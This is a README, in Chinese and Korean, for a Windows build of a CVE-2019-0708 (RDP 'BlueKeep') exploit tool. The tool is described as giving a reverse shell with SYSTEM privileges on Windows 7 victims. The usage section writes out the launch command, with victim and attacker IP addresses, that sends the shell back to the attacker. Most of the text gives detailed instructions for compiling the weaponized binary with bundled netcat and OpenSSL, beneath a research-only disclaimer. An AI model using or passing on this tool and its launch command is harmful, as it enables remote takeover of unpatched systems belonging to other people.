CVE-2019-0708-EXP-Windows-Version
声明 / 고지
作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关
→ 저자의 PoC는 연구 목적으로만 제공됩니다. 독자가 이 PoC를 이용하여 다른 행위를 할 경우, 작성자와 무관합니다.
목차
[toc]
소개
CVE-2019-0708-EXP Windows 버전 단일 파일 exe로 실행되며, linux, python, ruby 등이 필요 없습니다. 실행 후 현재 콘솔에서 직접 System 권한 Shell이 리버스됩니다.
컴파일은 전체 정적 라이브러리 모드로 모든 dll을 인라인하며, netcat과 openssl을 통합하고, 진행률 표시줄 표시 및 shell 에코(echo) 조작을 지원합니다.
复现环境 / 재현 환경
- 피해자 운영체제 Victim: Windows 7 sp1 x64 운영체제
- 공격자 운영체제 Attacker: Windows 10 x64 운영체제
- 컴파일 환경 Visual Studio 2013
使用说明 / 사용 설명
- CVE-2019-0708-EXP-Release 디렉터리로 이동합니다.
- wfreerdp.exe /v:Victim_IP /l:Attacker_IP 실행, 예: wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17
安装教程 / 설치 튜토리얼
- FreeRDP-master 프로젝트를 E:\git\KernelResearch\FreeRDP-master\ 경로로 복사합니다.
- Openssl 컴파일 환경을 설치하거나, openssl.7z을 C:\openssl\에 직접 압축 해제하여 이미 컴파일된 Openssl 환경을 사용합니다.
- Nasm 컴파일 환경을 설치합니다.
- cmake-3.15.3-win64-x64.msi를 관리자 권한으로 설치합니다.
- C:\Program Files\CMake\bin을 path 환경 변수에 추가합니다.
- 컴퓨터를 재시작합니다.
- "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt 실행
- 프로젝트를 컴파일합니다. 여전히 파일이 부족하다면 FreeRDP-master-restore.7z에서 복원할 수 있습니다.
Openssl编译环境安装教程 / Openssl 컴파일 환경 설치 튜토리얼
- openssl-1.0.2s.tar.gz을 C:\openssl\에 압축 해제합니다.
- ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi을 설치합니다.
- C:\Perl64\bin을 path 환경 변수에 추가합니다.
- 시작 메뉴에서 VS2013 x64 네이티브 도구 명령 프롬프트를 엽니다.
- perl Configure VC-WIN64A 실행
- cd /d C:\openssl\ 실행
- ms\do_win64a 실행
- 이제 컴파일을 시작합니다. 다음 모드를 사용할 수 있으며, exp에서는 정적 라이브러리 모드를 사용합니다:
OpenSSL 동적 라이브러리 컴파일: nmake -f ms\ntdll.mak
OpenSSL 정적 라이브러리 컴파일: nmake -f ms\nt.mak
OpenSSL 동적 라이브러리 테스트: nmake -f ms\ntdll.mak test
OpenSSL 정적 라이브러리 테스트: nmake -f ms\nt.mak test
OpenSSL 동적 라이브러리 설치: nmake -f ms\ntdll.mak install
OpenSSL 정적 라이브러리 설치: nmake -f ms\nt.mak install
이전 OpenSSL 동적 라이브러리 컴파일을 정리하여 다시 컴파일: nmake -f ms\ntdll.mak clean
이전 OpenSSL 정적 라이브러리 컴파일을 정리하여 다시 컴파일: nmake -f ms\nt.mak clean
- 완료 후 직접 out32 디렉터리에서 libeay32.lib와 ssleay32.lib 파일을 찾아 C:\openssl\lib\에 복사합니다.
Nasm编译环境安装教程 / Nasm 컴파일 환경 설치 튜토리얼
- nasm-2.14.02-installer-x64.exe를 관리자 권한으로 설치합니다.
- C:\Program Files\NASM을 path 환경 변수에 추가합니다.
- nasmBuildCustomizations.rar을 압축 해제한 후 그중 3개 파일을 C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\에 복사합니다.
- client->common->freerdp-client 프로젝트 디렉터리를 선택하고 우클릭 -> "빌드 종속성" -> "빌드 사용자 지정"을 클릭한 다음 nasm 항목을 체크합니다(masm이 아님에 주의).
- freerdp-client 프로젝트에서 임의의 asm 파일을 선택했을 때 우클릭 메뉴에 컴파일 옵션이 나타나면 Nasm 컴파일 환경 설치가 성공한 것입니다.
运行效果 / 실행 결과

项目托管 / 프로젝트 호스팅
我的poc地址
参与贡献 / 기여
作者来自ZheJiang Guoli Security Technology,邮箱[email protected]
→ 저자는 ZheJiang Guoli Security Technology 소속이며, 이메일: [email protected]